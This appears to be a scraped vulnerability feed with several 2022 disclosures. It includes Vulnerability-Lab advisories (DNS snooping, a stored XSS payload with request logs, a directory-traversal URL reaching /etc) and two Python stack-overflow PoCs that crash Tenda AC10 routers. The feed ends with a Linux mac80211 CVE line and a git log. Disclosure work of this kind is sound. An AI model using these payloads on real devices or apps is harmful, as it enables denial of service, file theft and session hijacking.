Tenda AC15 V15.03.05.18 was discovered to contain a stack overflow via the timeZone parameter in the form_fast_setting_wifi_set function.

CVE-2022-43259

RRX IOB LP version 1.0 suffers from a DNS cache snooping vulnerability.

    Document Title:===============RRX IOB LP v1.0 - DNS Cache Snooping VulnerabilityReferences (Source):====================https://www.vulnerability-lab.com/get_content.php?id=2261Article:https://www.vulnerability-db.com/?q=articles/2022/10/11/rhein-ruhr-express-rrx-dns-cache-snooping-vulnerability-wifi-hotspotRelease Date:=============2022-10-11Vulnerability Laboratory ID (VL-ID):====================================2261Common Vulnerability Scoring System:====================================5.3Vulnerability Class:====================MultipleCurrent Estimated Price:========================2.000€ - 3.000€Product & Service Introduction:===============================This product, solution or service ("Product") contains third-party software components listed in this document. These components are Open SourceSoftware licensed under a license approved by the Open Source Initiative (www.opensource.org) or similar licenses as determined by SIEMENS ("OSS")and/or commercial or freeware software components. With respect to the OSS components, the applicable OSS license conditions prevail over any otherterms and conditions covering the Product. The OSS portions of this Product are provided royalty-free and can be used at no charge.If SIEMENS has combined or linked certain components of the Product with/to OSS components licensed under the GNU LGPL version 2 or later as per thedefinition of the applicable license, and if use of the corresponding object file is not unrestricted ("LGPL Licensed Module", whereas the LGPLLicensed Module and the components that the LGPL Licensed Module is combined with or linked to is the "Combined Product"), the following additionalrights apply, if the relevant LGPL license criteria are met: (i) you are entitled to modify the Combined Product for your own use, including but notlimited to the right to modify the Combined Product to relink modified versions of the LGPL Licensed Module, and (ii) you may reverse-engineer theCombined Product, but only to debug your modifications. The modification right does not include the right to distribute such modifications and youshall maintain in confidence any information resulting from such reverse-engineering of a Combined Product.Certain OSS licenses require SIEMENS to make source code available, for example, the GNU General Public License, the GNU Lesser General Public Licenseand the Mozilla Public License. If such licenses are applicable and this Product is not shipped with the required source code, a copy of this sourcecode can be obtained by anyone in receipt of this information during the period required by the applicable OSS licenses by contacting the following address.Abstract Advisory Information:==============================The vulnerability laboratory core research team discovered a dns snooping vulnerability in the Rhein Ruhr Express (RRX IOB Landing Page 1.0 - Open Source Software) with Hotspot Siemens Portal.Vulnerability Disclosure Timeline:==================================2020-08-03: Researcher Notification & Coordination (Security Researcher)2020-08-04: Vendor Notification (Security Department)2020-08-27: Vendor Response/Feedback #1 (Security Department)2020-11-10: Vendor Response/Feedback #2 (Security Department)2021-01-30: Security Acknowledgements (Security Department)2022-10-09: Vendor Fix/Patch by Check (Service Developer Team)2022-10-11: Public Disclosure (Vulnerability Laboratory)Discovery Status:=================PublishedExploitation Technique:=======================RemoteSeverity Level:===============MediumAuthentication Type:====================Restricted Authentication (Guest Privileges)User Interaction:=================No User InteractionDisclosure Type:================Responsible DisclosureTechnical Details & Description:================================A dns cache snooping vulnerability has been discovered in the official Rhein Ruhr Express (RRX IOB Landing Page 1.0 - Open Source Software) with Hotspot Siemens Portal.The vulnerability allows remote attackers to determine resolved sites and name servers to followup with manipulative interactions.The vulnerability allows remote attackers to determine which domains have recently been resolved via this name server, and therefore which hosts have been recently visited.For instance, if an attacker was interested in whether your company utilizes the online services of a particular financial institution, they would be able to use this attackto build a statistical model regarding company usage of that financial institution. Of course, the attack can also be usead to find B2B partners, web-surfing patterns, externalmail servers, and more. If this is an internal DNS server not accessible to outside networks, attacks would be limited to the internal network. This may include employees,consultants and potentially users on a guest network or WiFi connection if supported.Proof of Concept (PoC):=======================The dns cache snooping vulnerability can be exploited by remote attackers with wifi guest access without user interaction or privileged user account.For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.--- PoC Session Logs ---Sent a non-recursive query for test.comand received 1 answer: dnsmasq-2.7593.184.216.34Hosts53 / udp / dns   192.168.44.1Solution - Fix & Patch:=======================Improve the cache management via dns to ensure no manipulations can take place.Contact the manufacturer siemens to resolve the issue by an automated or manual patch.2022-10-09: Vendor Fix/Patch by Check (Service Developer Team)The patching process will be delivered by siemens during train maintenance and will take at least until 2022 Q2-Q3 to be rolled out on all trains (40+).Security Risk:==============The security risk of the web vulnerability in the siemens hotspot rxx wifi is estimated as medium.Credits & Authors:==================Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-LabDisclaimer & Information:=========================The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Labor its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profitsor special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states donot allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.Domains:www.vulnerability-lab.com    www.vuln-lab.com        www.vulnerability-db.comServices:   magazine.vulnerability-lab.com  paste.vulnerability-db.com       infosec.vulnerability-db.comSocial:      twitter.com/vuln_lab    facebook.com/VulnerabilityLab       youtube.com/user/vulnerability0labFeeds:      vulnerability-lab.com/rss/rss.php   vulnerability-lab.com/rss/rss_upcoming.php   vulnerability-lab.com/rss/rss_news.phpPrograms:   vulnerability-lab.com/submit.php   vulnerability-lab.com/register.php  vulnerability-lab.com/list-of-bug-bounty-programs.phpAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of othermedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and otherinformation on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use oredit our material contact (admin@ or research@) to get a ask permission.            Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™-- VULNERABILITY LABORATORY (VULNERABILITY LAB)RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

RRX IOB LP 1.0 DNS Cache Snooping

WiFi File Transfer version 1.0.8 suffers from a cross site scripting vulnerability.

Document Title:  
===============  
WiFi File Transfer v1.0.8 - Cross Site Scripting Vulnerabilities

References (Source):  
====================  
https://www.vulnerability-lab.com/get_content.php?id=2322

Release Date:  
=============  
2022-10-17

Vulnerability Laboratory ID (VL-ID):  
====================================  
2322

Common Vulnerability Scoring System:  
====================================  
5.6

Vulnerability Class:  
====================  
Cross Site Scripting - Persistent

Current Estimated Price:  
========================  
500€ - 1.000€

Product & Service Introduction:  
===============================  
WiFi File Transfer lets you transfer files to/from your phone or tablet via WiFi. Easy to use web interface, no USB cable required.

(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.smarterdroid.wififiletransfer&hl=de&gl=US  )

Abstract Advisory Information:  
==============================  
The vulnerability laboratory core research team discovered a multiple persistent cross site vulnerabilities in the WiFi File Transfer v1.0.8 mobile android web-application.

Affected Product(s):  
====================  
smarterDroid  
Product: WiFi File Transfer v1.0.8 - Android (Wifi) (Web-Application)

Vulnerability Disclosure Timeline:  
==================================  
2022-10-17: Public Disclosure (Vulnerability Laboratory)

Discovery Status:  
=================  
Published

Exploitation Technique:  
=======================  
Remote

Severity Level:  
===============  
Medium

Authentication Type:  
====================  
Open Authentication (Anonymous Privileges)

User Interaction:  
=================  
Low User Interaction

Disclosure Type:  
================  
Independent Security Research

Technical Details & Description:  
================================  
A persistent input validation web vulnerability has been discovered in the WiFi File Transfer v1.0.8 mobile web-application for android.  
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application  
requests from the application-side.

The vulnerabilities are located in the data_file parameter of the add a file or folder and create a zip file function.  
Attackers with wifi access are able to anonymous use the webui and can inject own malicious script code with persistent  
attack vector via post method request.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external  
redirects to malicious source and persistent manipulation of affected application modules.

Proof of Concept (PoC):  
=======================  
The persistent post inject web vulnerabilities can be exploited by remote attackers in the same wifi network with anonymous privileges and low user interaction.  
For security demonstration or to reproduce the web security vulnerability in the application follow the provided information and steps below to continue.

Manual reproduce of the vulnerability ...  
1. Install the mobile android application and start it  
2. Start the wifi web-server  
3. Login as attacker by the browser over the network  
4. Inject payload as folder name, file name or zip file and save via post method request  
5. The payload executes in the web ui when previewing the paths

Exploitation: Payload  
<a onmouseover=alert(document.cookie)>picture1337.jpg</a>

--- PoC Session Logs #1 (POST) [Add] [Create] [Folder] [data_file] ---  
http://localhost:1234/storage/emulated/0/DCIM/  
Host: localhost:1234  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data; boundary=---------------------------321836412920954805143620932676  
Content-Length: 613  
Origin:http://localhost:1234  
Connection: keep-alive  
Referer:http://localhost:1234/storage/emulated/0/DCIM/  
action=mkdir&data_file=New"><a onmouseover=alert(document.cookie)>picture1337.jpg</a>&data_currentParams=?&data_filepath=/storage/emulated/0/DCIM/  
-  
POST: HTTP/1.1 302 OK  
Connection: Close  
Content-Type: text/html  
Location:http://localhost:1234/storage/emulated/0/DCIM/  
Content-Length: 143  
-  
http://localhost:1234/storage/emulated/0/DCIM/  
Host: localhost:1234  
Accept-Encoding: gzip, deflate  
Referer:http://localhost:1234/storage/emulated/0/DCIM/  
Connection: keep-alive  
-  
POST: HTTP/1.1 200 OK  
Connection: Close  
Content-Type: text/html

--- PoC Session Logs #2 (POST) [Add] [Create] [Zip] [data_file] ---  
http://localhost:1234/storage/emulated/0/Pictures/?  
Host: localhost:1234  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data; boundary=---------------------------289297208414223233314228108045  
Content-Length: 882  
Origin:http://localhost:1234  
Connection: keep-alive  
Referer:http://localhost:1234/storage/emulated/0/Pictures/?  
Upgrade-Insecure-Requests: 1  
action=multizip&data_file=.<a onmouseover=alert(document.cookie)>File.Zip</a>.Zip&data_currentParams=?&data_filepath=/storage/emulated/0/Pictures/&1.jpg=file&2.jpg=file  
-  
POST: HTTP/1.1 200 OK  
Connection: Close  
Content-Type: text/html  
Location:http://localhost:1234/storage/emulated/0/Pictures/  
Content-Length: 151  
-  
http://localhost:1234/storage/emulated/0/Pictures/  
Host: localhost:1234  
Accept-Encoding: gzip, deflate  
Referer:http://localhost:1234/storage/emulated/0/Pictures/?  
Connection: keep-alive  
Upgrade-Insecure-Requests: 1  
-  
POST: HTTP/1.1 200 OK  
Connection: Close  
Content-Type: text/html

Reference(s):  
http://localhost:1234/  
http://localhost:1234/storage/  
http://localhost:1234/storage/emulated/  
http://localhost:1234/storage/emulated/0/  
http://localhost:1234/storage/emulated/0/DCIM/  
http://localhost:1234/storage/emulated/0/Pictures/

Solution - Fix & Patch:  
=======================  
The persistent web vulnerabilities can be resolved by the following steps ...  
1. Restrict the input of the folder, filename and zip files to disallow special chars for add or create process  
2. Encode and escape the content of the data_file parameter to sanitize the content  
3. Sanitize and filter the output locations of the explorer path listings to prevent further attacks

Security Risk:  
==============  
The security risk of the persistent web vulnerabilities in the mobile android wifi web-application are estimated as medium.

Credits & Authors:  
==================  
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,  
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab  
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits  
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do  
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.  
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:   https://www.vulnerability-lab.com  ;  https://www.vuln-lab.com  ;https://www.vulnerability-db.com

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.  
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other  
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other  
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or  
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™

--   
VULNERABILITY LABORATORY (VULNERABILITY LAB)  
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

WiFi File Transfer 1.0.8 Cross Site Scripting

Webile version 1.0.1 suffers from a directory traversal vulnerability.

    Document Title:===============Webile v1.0.1 - Directory Traversal Web VulnerabilityReferences (Source):====================https://www.vulnerability-lab.com/get_content.php?id=2320Release Date:=============2022-10-10Vulnerability Laboratory ID (VL-ID):====================================2320Common Vulnerability Scoring System:====================================7.3Vulnerability Class:====================Directory- or Path-TraversalCurrent Estimated Price:========================1.000€ - 2.000€Product & Service Introduction:===============================Webile, is a local area network cross-platform file management tool based on http protocol. Using the personal mobile phone as a server inthe local area network, browsing mobile phone files, uploading files, downloading files, playing videos, browsing pictures, transmitting data,statistics files, displaying performance, etc. No need to connect to the Internet, you can browse files, send data, play videos and otherfunctions through WiFi LAN or mobile phone hotspot, and no additional data traffic will be generated during data transmission. Support Mac,Windows, Linux, iOS, Android and other multi-platform operating systems.(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.wifile.webile&hl=en&gl=US  )Abstract Advisory Information:==============================The vulnerability laboratory core research team discovered a directory traversal web vulnerability in the Webile v1.0.1 Wifi mobile web application.Affected Product(s):====================Product Owner: WebileProduct: Webile v1.0.1 - (Framework) (Mobile Web-Application)Vulnerability Disclosure Timeline:==================================2022-02-06: Researcher Notification & Coordination (Security Researcher)2022-02-07: Vendor Notification (Security Department)2022-**-**: Vendor Response/Feedback (Security Department)2022-**-**: Vendor Fix/Patch (Service Developer Team)2022-**-**: Security Acknowledgements (Security Department)2022-10-10: Public Disclosure (Vulnerability Laboratory)Discovery Status:=================PublishedExploitation Technique:=======================RemoteSeverity Level:===============HighAuthentication Type:====================Open Authentication (Anonymous Privileges)User Interaction:=================No User InteractionDisclosure Type:================Independent Security ResearchTechnical Details & Description:================================A directory traversal web vulnerability has been discovered  in the Webile v1.0.1 wifi mobile web application.The vulnerability allows remote attackers to change the application path in performed requests to compromise thelocal application or file-system of a mobile device. Attackers are for example able to request environmentvariables or a sensitive system path.The directory-traversal web vulnerability is located in the insecure web-server configuration. The path of the local user is notsecure restricted and validated. Thus allows an unauthenticated user with wifi access to request local web-server files withoutsecure permission. The bug itself is located in the filepath parameter of the change_upload_dir function.Exploitation of the directory traversal web vulnerability requires no privileged web-application user account or user interaction.Successful exploitation of the vulnerability results in information leaking by unauthorized file access and mobile application compromise.Proof of Concept (PoC):=======================The directory traversal web vulnerability can be exploited by remote attackers without user account or user interaction.For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue.PoC: Exploitationhttp://localhost:8080/webile_select_dir?t=change_upload_dir&filepath=../../../../../../../../../../../../etc/--- PoC Session Logs ---http://localhost:8080/webile_select_dir?t=change_upload_dir&filepath=../../../../../../../../../../../../etc/Host: localhost:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveCookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6Upgrade-Insecure-Requests: 1-GET: HTTP/1.1 200 OKContent-Type: text/html; charset=UTF-8Connection: keep-aliveContent-Encoding: gzipTransfer-Encoding: chunked--- FS Session Logs ---Output:File name   bluetoothbpfcarriercompatconfiginitpermissionspppseccomp_policysecurityselinuxsensorssysconfigtextclassifierthemevintfepdgipmSecurity Risk:==============The security risk of the directory traversal web vulnerability in the mobile web application is estimated as high.Credits & Authors:==================Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-LabDisclaimer & Information:=========================The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Labor its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profitsor special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states donot allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.Domains:   https://www.vulnerability-lab.com  ;  https://www.vuln-lab.com  ;https://www.vulnerability-db.comAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of othermedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and otherinformation on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use oredit our material contact (admin@ or research@) to get a ask permission.            Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™-- VULNERABILITY LABORATORY (VULNERABILITY LAB)RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Webile 1.0.1 Directory Traversal

Tenda AC10 V15.03.06.23 contains a Stack overflow vulnerability via /goform/addWifiMacFilter.

Permalink

Cannot retrieve contributors at this time

**Tenda AC10V15.03.06.23 Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2734.html
    

**Affected version**

**Vulnerability details**

/goform/addWifiMacFilter, device\_mac, device\_id are controllable and will be copied to mib\_value by sprintf. It is worth noting that the size is not checked, resulting in a stack overflow vulnerability

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'device\_id=1&device\_mac=' + p1

p3 \= b"POST /goform/addWifiMacFilter" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-42169: IOT_Vul/readme.md at main · z1r00/IOT_Vul

Tenda AC10 V15.03.06.23 contains a Stack overflow vulnerability via /goform/formWifiWpsStart.

Permalink

Cannot retrieve contributors at this time

**Tenda AC10V15.03.06.23 Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2734.html
    

**Affected version**

**Vulnerability details**

/goform/WifiWpsStart，The index and mode are controllable. If the conditions are met to sprintf, they will be spliced into tmp. It is worth noting that there is no size check,which leads to a stack overflow vulnerability.

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'mode=1&index=' + p1

p3 \= b"POST /goform/WifiWpsStart" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: curShow=; ac\_login\_info=passwork; test=A; password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-42170: IOT_Vul/readme.md at main · z1r00/IOT_Vul

An issue was discovered in the Linux kernel before 5.19.16. Attackers able to inject WLAN frames could cause a buffer overflow in the ieee80211_bss_info_update function in net/mac80211/scan.c.

AgeCommit message (Expand)AuthorFilesLines 2022-09-04Merge tag 'wireless-next-2022-09-03' of git://git.kernel.org/pub/scm/linux/ke...David S. Miller1\-1/+1 2022-09-03wifi: mac80211: fix double SW scan stopJohannes Berg1\-1/+1 2022-08-25wifi: mac80211: Fix UAF in ieee80211\_scan\_rx()Siddh Raman Pant1\-4/+7 2022-07-15wifi: mac80211: fix multi-BSSID element parsingJohannes Berg1\-4/+8 2022-06-20wifi: mac80211: move interface config to new structJohannes Berg1\-1/+1 2022-05-04mac80211: upgrade passive scan to active scan on DFS channels after beacon rxFelix Fietkau1\-0/+20 2021-09-23mac80211: always allocate struct ieee802\_11\_elemsJohannes Berg1\-6/+10 2021-05-31mac80211: fix skb length check in ieee80211\_scan\_rx()Du Cheng1\-5/+16 2020-09-28mac80211: convert S1G beacon to scan resultsThomas Pedersen1\-4/+13 2020-09-28mac80211: s1g: choose scanning width based on frequencyThomas Pedersen1\-0/+17 2020-09-28nl80211/cfg80211: support 6 GHz scanningTova Mussai1\-2/+7 2020-07-31mac80211: remove unused flags argument in transmit functionsMathy Vanhoef1\-1/+1 2020-07-31mac80211: use same flag everywhere to avoid sequence number overwriteMathy Vanhoef1\-4/+3 2020-07-31nl80211: S1G band and channel definitionsThomas Pedersen1\-0/+1 2020-05-31mac80211: Add HE 6GHz capabilities element to probe requestIlan Peer1\-8/+9 2020-05-31mac80211: avoid using ext NSS high BW if not supportedJohannes Berg1\-0/+6 2020-04-24mac80211: add freq\_offset to RX statusThomas Pedersen1\-1/+2 2020-04-24mac80211: handle channel frequency offsetThomas Pedersen1\-0/+1 2020-02-21cfg80211: remove support for adjacent channel compensationEmmanuel Grumbach1\-2/+1 2019-10-07mac80211: fix scan when operating on DFS channels in ETSI domainsAaron Komisar1\-2/+28 2019-06-19treewide: Replace GPLv2 boilerplate/reference with SPDX - rule 500Thomas Gleixner1\-4/+1 2019-02-08mac80211: support multi-bssidSara Sharon1\-2/+9 2019-02-08mac80211: move the bss update from elements to an helperSara Sharon1\-70/+80 2019-02-08mac80211: pass bssids to elements parsing functionSara Sharon1\-35/+40 2018-11-09mac80211: allow hardware scan to fall back to softwareJohannes Berg1\-4/+18 2018-06-30Merge tag 'mac80211-next-for-davem-2018-06-29' of git://git.kernel.org/pub/sc...David S. Miller1\-6/+50 2018-06-15mac80211: support scan features for improved scan privacyJohannes Berg1\-5/+30 2018-06-15mac80211: split ieee80211\_send\_probe\_req()Johannes Berg1\-2/+20 2018-06-15mac80211: add probe request building flagsJohannes Berg1\-3/+4 2018-06-12treewide: kzalloc() -> kcalloc()Kees Cook1\-1/+1 2018-03-21mac80211: inform wireless layer when frame RSSI is invalidTosoni1\-1/+3 2017-09-21mac80211: oce: enable receiving of bcast probe respRoee Zamir1\-9/+28 2017-04-28cfg80211: add request id to cfg80211\_sched\_scan\_\*() apiArend Van Spriel1\-2/+2 2017-04-28mac80211: separate encoding/bandwidth from flagsJohannes Berg1\-4/+4 2017-04-28mac80211: clean up rate encoding bits in RX statusJohannes Berg1\-4/+4 2016-12-13mac80211: Remove unused 'len' variableKirtika Ruchandani1\-5/+3 2016-09-15mac80211: fix scan completed tracingJohannes Berg1\-1/+1 2016-07-06mac80211: report failure to start (partial) scan as scan abortJohannes Berg1\-2/+3 2016-07-06mac80211: Add support for beacon report radio measurementAvraham Stern1\-8/+34 2016-07-06nl80211: support beacon report scanningAvraham Stern1\-2/+7 2016-04-12cfg80211: remove enum ieee80211\_bandJohannes Berg1\-6/+6 2016-04-05mac80211: Support a scan request for a specific BSSIDJouni Malinen1\-1/+3 2016-04-05mac80211: allow drivers to report CLOCK\_BOOTTIME for scan resultsJohannes Berg1\-1/+3 2016-01-26mac80211: Requeue work after scan complete for all VIF types.Sachin Kulkarni1\-1/+11 2016-01-14mac80211: handle sched\_scan\_stopped vs. hw restart raceEliad Peller1\-0/+8 2015-12-02mac80211: do not actively scan DFS channelsAntonio Quartulli1\-4/+5 2015-11-03mac80211: don't reconfigure sched scan in case of wowlanEliad Peller1\-5/+7 2015-10-14mac80211: remove PM-QoS listenerJohannes Berg1\-1/+0 2015-10-13mac80211: use new cfg80211\_inform\_bss\_frame\_data() APIJohannes Berg1\-10/+9 2015-06-10mac80211: convert HW flags to unsigned long bitmapJohannes Berg1\-5/+5 2015-06-09mac80211: ignore invalid scan RSSI valuesSara Sharon1\-1/+7 2015-06-02mac80211: rename single hw-scan flag to follow naming conventionJohannes Berg1\-3/+3 2015-03-30mac80211: IBSS fix scan requestJanusz.Dziedzic@tieto.com1\-9/+16 2015-01-23mac80211: complete scan work immediately if quiesced or suspendedLuciano Coelho1\-0/+5 2015-01-14mac80211: don't defer scans in case of radar detectionEliad Peller1\-1/+1 2015-01-14mac80211: remove local->radar\_detect\_enabledEliad Peller1\-1/+1 2015-01-14mac80211: let flush() drop packets when possibleEmmanuel Grumbach1\-2/+2 2014-11-19mac80211: allow drivers to support NL80211\_SCAN\_FLAG\_RANDOM\_ADDRJohannes Berg1\-10/+38 2014-11-19mac80211: rcu-ify scan and scheduled scan request pointersJohannes Berg1\-30/+49 2014-11-19mac80211: remove redundant checkEliad Peller1\-1/+1 2014-09-05mac80211: add Intel Mobile Communications copyrightJohannes Berg1\-0/+1 2014-08-26mac80211: scan: Replace rcu\_assign\_pointer() with RCU\_INIT\_POINTER()Andreea-Cristina Bernat1\-1/+1 2014-06-25mac80211: split sched scan IEsDavid Spinadel1\-23/+24 2014-06-25mac80211: support more than one band in scan requestDavid Spinadel1\-25/+60 2014-05-09mac80211: handle failed restart/resume betterJohannes Berg1\-5/+10 2014-04-09mac80211: use RCU\_INIT\_POINTERMonam Agarwal1\-5/+5 2014-03-19mac80211: release sched\_scan\_sdata when stopping sched scanAlexander Bondar1\-2/+4 2014-02-20mac80211: allow driver to return error from sched\_scan\_stopJohannes Berg1\-1/+1 2014-02-11mac80211: fix IE buffer lenDavid Spinadel1\-5/+2 2013-12-16mac80211: reschedule sched scan after HW restartDavid Spinadel1\-14/+39 2013-12-16Merge remote-tracking branch 'wireless-next/master' into mac80211-nextJohannes Berg1\-1/+1 2013-12-06Merge branch 'master' of git://git.kernel.org/pub/scm/linux/kernel/git/linvil...John W. Linville1\-1/+1 2013-12-05mac80211: start\_next\_roc only if scan was actually runningEliad Peller1\-1/+3 2013-12-05mac80211: determine completed scan type by defined opsEliad Peller1\-8/+7 2013-12-03mac80211: remove duplicate codeEliad Peller1\-8/+0 2013-11-25cfg80211: consolidate passive-scan and no-ibss flagsLuis R. Rodriguez1\-5/+5 2013-11-25mac80211: fix scheduled scan rtnl deadlockJohannes Berg1\-1/+1 2013-11-04Merge branch 'master' of git://git.kernel.org/pub/scm/linux/kernel/git/linvil...John W. Linville1\-0/+19 2013-10-23Merge git://git.kernel.org/pub/scm/linux/kernel/git/davem/netDavid S. Miller1\-0/+19 2013-10-09mac80211: correctly close cancelled scansEmmanuel Grumbach1\-0/+19 2013-09-26mac80211: change beacon/connection pollingStanislaw Gruszka1\-2/+1 2013-07-16mac80211: allow scanning for 5/10 MHz channels in IBSSSimon Wunderlich1\-6/+39 2013-07-16mac80211: select and adjust bitrates according to channel modeSimon Wunderlich1\-2/+25 2013-06-13mac80211: track AP's beacon rate and give it to the driverAlexander Bondar1\-0/+9 2013-04-16mac80211: parse VHT channel switch IEsJohannes Berg1\-1/+1 2013-04-08mac80211: check ERP info IE length in parserJohannes Berg1\-3/+2 2013-03-25mac80211: Use a cfg80211\_chan\_def in ieee80211\_hw\_conf\_chanKarl Beldan1\-3/+3 2013-03-18mac80211: pass queue bitmap to flush operationJohannes Berg1\-2/+2 2013-03-11mac80211: remove a few set but unused variablesJohannes Berg1\-3/+0 2013-02-15mac80211: add radar detection command/eventSimon Wunderlich1\-0/+3 2013-02-11mac80211: Add flushes before going off-channelSeth Forshee1\-0/+3 2013-02-11mac80211: Fix tx queue handling during scansSeth Forshee1\-3/+6 2013-02-11mac80211: introduce beacon-only timing dataJohannes Berg1\-1/+4 2013-02-11cfg80211: pass wiphy to cfg80211\_ref\_bss/put\_bssJohannes Berg1\-1/+2 2013-01-31mac80211: improve latency and throughput while software scanningStanislaw Gruszka1\-27/+5 2013-01-31mac80211: start auth/assoc timeout on frame statusJohannes Berg1\-1/+2 2013-01-31mac80211: remove unused mesh data from bssJohannes Berg1\-9/+0 2013-01-31mac80211: remove last\_probe\_resp from bssJohannes Berg1\-3/+0 2013-01-28Merge branch 'master' of git://git.kernel.org/pub/scm/linux/kernel/git/linvil...John W. Linville1\-10/+5 2013-01-16mac80211: synchronize scan off/on-channel and PS statesStanislaw Gruszka1\-10/+5 2013-01-03mac82011: use frame control to differentiate probe resp/beaconEmmanuel Grumbach1\-5/+4 2013-01-03mac80211: fix dtim\_period in hidden SSID AP associationJohannes Berg1\-12/+0 2013-01-03mac80211: fix ibss scanningStanislaw Gruszka1\-10/+24 